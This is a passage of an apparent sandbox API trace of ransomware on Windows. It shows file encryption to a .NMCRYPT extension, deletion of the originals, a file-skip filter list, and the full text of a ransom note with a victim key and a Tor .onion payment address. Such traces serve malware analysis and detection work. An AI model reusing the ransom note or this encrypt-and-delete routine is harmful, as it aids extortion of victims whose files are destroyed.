hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.473] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0157.473] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0157.474] CryptCreateHash (in: hProv=0x8e3bb0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447ac | out: phHash=0x1d4447ac) returned 1 [0157.474] CryptHashData (hHash=0x9ad878, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0157.474] CryptDeriveKey (in: hProv=0x8e3bb0, Algid=0x6610, hBaseData=0x9ad878, dwFlags=0x4, phKey=0x1d4447b0 | out: phKey=0x1d4447b0*=0x9ad2b8) returned 1 [0157.474] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0157.474] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0157.474] wcslen (_String="\\\\?\\") returned 0x4 [0157.474] CryptDuplicateKey (in: hKey=0x9ad2b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad5b8) returned 1 [0157.474] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0157.475] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0157.475] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=471) returned 1 [0157.475] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0157.476] ReadFile (in: hFile=0x1624, lpBuffer=0x607e48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e48*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.476] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.476] GetLastError () returned 0x0 [0157.476] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.477] ReadFile (in: hFile=0x1624, lpBuffer=0x607e48, nNumberOfBytesToRead=0xd7, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e48*, lpNumberOfBytesRead=0x2d7dc80*=0xd7, lpOverlapped=0x0) returned 1 [0157.477] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xd7, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xe0) returned 1 [0157.477] GetLastError () returned 0x0 [0157.478] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0xe0, lpOverlapped=0x0) returned 1 [0157.478] ReadFile (in: hFile=0x1624, lpBuffer=0x607e48, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e48*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0157.478] WriteFile (in: hFile=0x588, lpBuffer=0x607e48*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607e48*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0157.478] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml")) returned 0x20 [0157.478] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", dwFileAttributes=0x20) returned 0 [0157.478] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned 1 [0157.478] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml")) returned 0 [0157.478] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" [0157.478] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu") returned 1 [0157.478] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\.xXDA62.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\.xxda62.tmp")) returned 0xda62 [0157.479] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\.xXDA62.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\.xxda62.tmp"), dwFlags=0x1) returned 0 [0157.480] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\.xXDA62.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\.xxda62.tmp")) returned 1 [0157.480] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0157.480] wcslen (_String="OK") returned 0x2 [0157.480] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.480] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.480] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0157.480] CryptDestroyHash (hHash=0x9ad878) returned 1 [0157.480] CryptReleaseContext (hProv=0x8e3bb0, dwFlags=0x0) returned 1 [0157.480] FindNextFileW (in: hFindFile=0x9ad2f8, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 0 [0157.480] GetLastError () returned 0x12 [0157.480] FindClose (in: hFindFile=0x9ad2f8 | out: hFindFile=0x9ad2f8) returned 1 [0157.480] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0157.481] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0157.481] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0157.481] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0157.481] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.481] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.481] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0157.481] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.481] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.481] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*.exe") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*.dll") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*.lnk") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*.bat") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*.ini") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*.msi") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*.scf") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*pagefile.sys*") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*NTUSER.DAT*") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*AppData*") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*\\winrar\\*") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*\\java\\*") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*\\windows\\*") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*\\ESET\\*") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*\\AVG\\*") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*\\AVIRA\\*") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*Atheros*") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*Realtek*") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*bootmgr*") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*boot*") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*boot*") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*CONFIG.SYS*") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*IO.SYS*") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*MSDOS.SYS*") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*NTDETECT.COM*") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*ntldr*") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*chrome*") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*opera*") returned 0 [0157.482] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", pszSpec="*firefox*") returned 0 [0157.482] wcslen (_String="\\\\?\\") returned 0x4 [0157.482] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 0x9ad678 [0157.482] wcscmp (_String1=".", _String2=".") returned 0 [0157.482] FindNextFileW (in: hFindFile=0x9ad678, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0157.482] wcscmp (_String1="..", _String2=".") returned 1 [0157.482] wcscmp (_String1="..", _String2="..") returned 0 [0157.482] FindNextFileW (in: hFindFile=0x9ad678, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0157.482] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*NMCRYPT") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*Recovers your files.html") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*.exe") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*.dll") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*.lnk") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*.bat") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*.ini") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*.msi") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*.scf") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*pagefile.sys*") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*NTUSER.DAT*") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*AppData*") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*\\winrar\\*") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*\\java\\*") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*\\windows\\*") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*\\ESET\\*") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*\\AVG\\*") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*\\AVIRA\\*") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*Atheros*") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*Realtek*") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*bootmgr*") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*boot*") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*boot*") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*CONFIG.SYS*") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*IO.SYS*") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*MSDOS.SYS*") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*NTDETECT.COM*") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*ntldr*") returned 0 [0157.483] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*chrome*") returned 0 [0157.484] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*opera*") returned 0 [0157.484] PathMatchSpecW (pszFile="osknavbase.xml", pszSpec="*firefox*") returned 0 [0157.484] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml", pszSpec="*") returned 1 [0157.484] strlen (_Str="NMoreira") returned 0x8 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: 